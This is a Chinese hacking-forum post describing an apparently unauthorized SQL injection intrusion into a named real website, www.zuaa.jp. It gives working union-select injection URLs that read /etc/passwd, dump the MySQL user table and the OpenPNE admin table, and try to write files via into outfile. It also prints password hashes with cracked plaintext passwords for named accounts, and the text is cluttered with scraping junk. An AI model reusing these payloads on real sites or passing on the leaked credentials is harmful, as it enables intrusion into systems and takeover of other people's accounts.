原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

, Y" f& G5 a8 U0x01. 检测 www.zuaa.jp 收集数据
6 Z& w( R+ K. R; b; c5 |

( L9 D, P5 E3 mwhatweb
* A! P# D: D2 J7 I8 e8 K
; u5 g: c5 x$ X: `3 E$ Y
! y* Y2 M0 C, E8 N利用NMAP扫描
6 y$ B8 S; A) V8 r
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
: [) ]/ ]8 I8 h找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390

8 }1 H1 V2 @2 g: F4 j. M5 e
" ^3 Z( g6 ~$ e# e0x03.order by
/ c$ D/ i( c& s; W             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
3 S: w( H& K* K7 b) P! z& ~
order by 28报错，order by 27正常

+ i% M9 [1 @5 ^5 C5 e; d8 k0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示
' i4 c1 D! H  }# \* v. d* Z" r3 x
$ C- n9 j* d$ S1 ?% ?" O$ j中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
" Y: T3 }" t& k. H+ Z( H$ p
2 k( s% Y& ^4 ?" n4 H" E3 D, `) j0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: l0 K/ I5 L: S! R8 Y
user:            root@localhost
9 d  r3 }2 g4 a# fdatabase:    openpne
version:      4.1.22
2 W* s0 E' `( E5 Jos:             portbld-freebsd5.4

. }5 _6 w2 \. a0 d0x06. root用户
. w. B' A" L( \# G利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

6 e/ M% E0 h) M4 J1 ^通过工具转换

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
: N1 z. |5 \) O0 i% ~
0x07. 利用 into outfile
* W! O8 V, N, n% {7 j全部都失败
1 H4 a9 f- d8 i2 w) t/ ]http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

$ c, v" |3 B2 E- H' z3 {5 ?http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”

; k; k$ a2 D7 ~7 B* o* W; V0x08. 利用 mysql 4.1
* e6 B* {5 R$ _  @3 F" q* o! l猜常规表名，字段未果 工具 sqlmap
4 C7 a, I- A4 R$ s$ `2 A- S中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
. y! X; c/ Z% A6 \: l* e3 q

$ |" y( O. y3 ~" B, p5 a% q, |! E$ {6 {
0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

0x10.  MySL外联方法
9 F8 i# F; N  ]! Q% q+ Q3 d从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
. Q. ]! }; u3 z# r4 i; v- P可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
' M4 w" ]3 F3 Z
这个可以在 www.cmd5.com 解密
3 W9 e* [, X+ ?! v9 v( r6 vroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
. k5 V* J: I3 \$ S% Y1 y- [chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
& S. {% f1 K2 t& Lopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
5 q1 l+ Q1 L* W8 u; C工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

; z$ ?/ X' U" k/ u' Z2 J5 N( g) J
8 l  B3 @2 O, }6 _0x11. 网站突破
; p: v4 ~3 n5 o" D; S0 C发现网站的源程序 openpne, google 下载 openpne 源码


$ W9 V) p1 D( y1 J; Q( l0x12. 默认信息利用
2 }; C2 n8 c7 Ehttp://sns.zuaa.jp/?m=admin&a=page_login

* ^% b1 p" U/ T: o! f. B表名 (c_admin_user) ，字段名（username,password）
1 T' B) ?3 m: e! j3 bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

* L. r4 H. A8 y) Z, u/ O解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
# b$ O& H3 g, C( G% M$ K( Ezuaajp:c0923ec5857796a393da99905008c176,          zju1897
/ v& C" Q: `0 }5 A
5 M) X- J* W. a) M/ r3 T$ ^中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
% q0 d" N' N( m0 M/ i
& j  a( F6 p7 o8 P% I' _) D0x13. 登录后台



0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
6 ]- z* \+ X$ ^) C" S感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
' X# Q( F' B# a8 c' N; O- ]
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的